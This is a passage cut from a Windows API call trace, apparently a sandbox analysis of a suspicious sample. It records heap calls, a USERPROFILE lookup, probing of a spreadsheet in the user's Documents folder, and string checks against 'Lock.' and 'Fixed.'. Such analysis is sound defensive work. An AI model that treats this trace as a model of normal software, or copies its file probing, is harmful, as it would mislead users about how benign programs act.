Flags=0x0, Size=0x8) returned 0x24b18d8 [0263.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0263.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0263.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0263.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0263.042] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0263.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0263.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0263.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1b8 [0263.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0263.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0263.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1d0 [0263.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0263.042] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0263.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0263.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0263.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0263.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0263.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0263.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0263.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0263.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0263.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0263.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0263.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0263.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0263.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0263.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0263.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0263.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0263.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0263.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0263.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0263.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0263.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0263.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0263.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0263.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0263.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0263.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0263.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0263.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0263.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0263.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0263.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0263.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0263.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0263.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0263.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0263.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0263.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0263.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0263.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0263.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x64) returned 0x24202f0 [0263.044] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/IqPW.xlsx", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\IqPW.xlsx", lpFilePart=0x8bf658*="IqPW.xlsx") returned 0x31 [0263.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24202f0 | out: hHeap=0x25c0000) returned 1 [0263.044] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\IqPW.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\iqpw.xlsx")) returned 0xffffffff [0263.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0263.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0263.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0263.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0263.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0263.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0263.044] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0263.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0263.045] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0263.045] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0263.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0263.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0263.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0263.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0263.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0263.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0263.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0263.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0263.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0263.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0263.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0263.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0263.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0263.045] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Kji1x-v4FT0kOOxbY6", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0263.045] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ji1x-v4FT0kOOxbY6", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0263.045] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i1x-v4FT0kOOxbY6", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0263.046] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1x-v4FT0kOOxbY6", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0263.046] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x-v4FT0kOOxbY6", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0263.046] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-v4FT0kOOxbY6", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0263.046] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v4FT0kOOxbY6", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0263.046] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4FT0kOOxbY6", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0263.046] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FT0kOOxbY6", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0263.046] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="T0kOOxbY6", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0263.046] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0kOOxbY6", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0263.046] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kOOxbY6", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0263.046] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OOxbY6", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0263.046] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OxbY6", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0263.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0263.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0263.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0263.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0263.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0263.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0263.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0263.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d760 [0263.046] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0263.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0263.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0263.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0263.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0263.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0263.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0263.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0263.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0263.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0263.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0263.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0263.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0263.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0263.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0263.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0263.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0263.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0263.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0263.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x26) returned 0x249f170 [0263.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0263.047] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Kji1x-v4FT0kOOxbY6", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0263.048] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ji1x-v4FT0kOOxbY6", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0263.048] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i1x-v4FT0kOOxbY6", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0263.048] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1x-v4FT0kOOxbY6", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0263.048] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x-v4FT0kOOxbY6", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0263.048] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-v4FT0kOOxbY6", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0263.048] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v4FT0kOOxbY6", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0263.048] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4FT0kOOxbY6", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0263.048] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FT0kOOxbY6", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0263.048] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="T0kOOxbY6", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0263.048] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0kOOxbY6", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0263.048] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kOOxbY6", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0263.048] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OOxbY6", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0263.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0263.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b3538 [0263.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0263.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3538 | out: hHeap=0x25c0000) returned 1 [0263.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0263.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0263.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0263.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0263.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0263.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0263.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0263.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0263.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0263.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0263.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0263.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9390 | out: hHeap=0x25c0000) returned 1 [0263.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9390 [0263.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0263.049] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0263.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0263.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0263.049] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0263.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0263.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0263.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0263.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1708 [0263.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0263.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0263.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0263.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0263.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0263.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0263.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0263.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0263.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0263.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0263.050] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0263.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0263.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0263.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1b8 [0263.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0263.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0263.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a95b8 [0263.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0263.050] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0263.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0263.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0263.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0263.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0263.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0263.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0263.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0263.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0263.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0263.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0263.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0263.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0263.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0263.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0263.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0263.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0263.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0263.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0263.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0263.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0263.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0263.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0263.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0263.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0263.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0263.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0263.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0263.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0263.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b17b8 [0263.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0263.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0263.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0263.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0263.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0263.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0263.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0263.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0263.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0263.052] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0263.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0263.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0263.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d68 [0263.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0263.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | 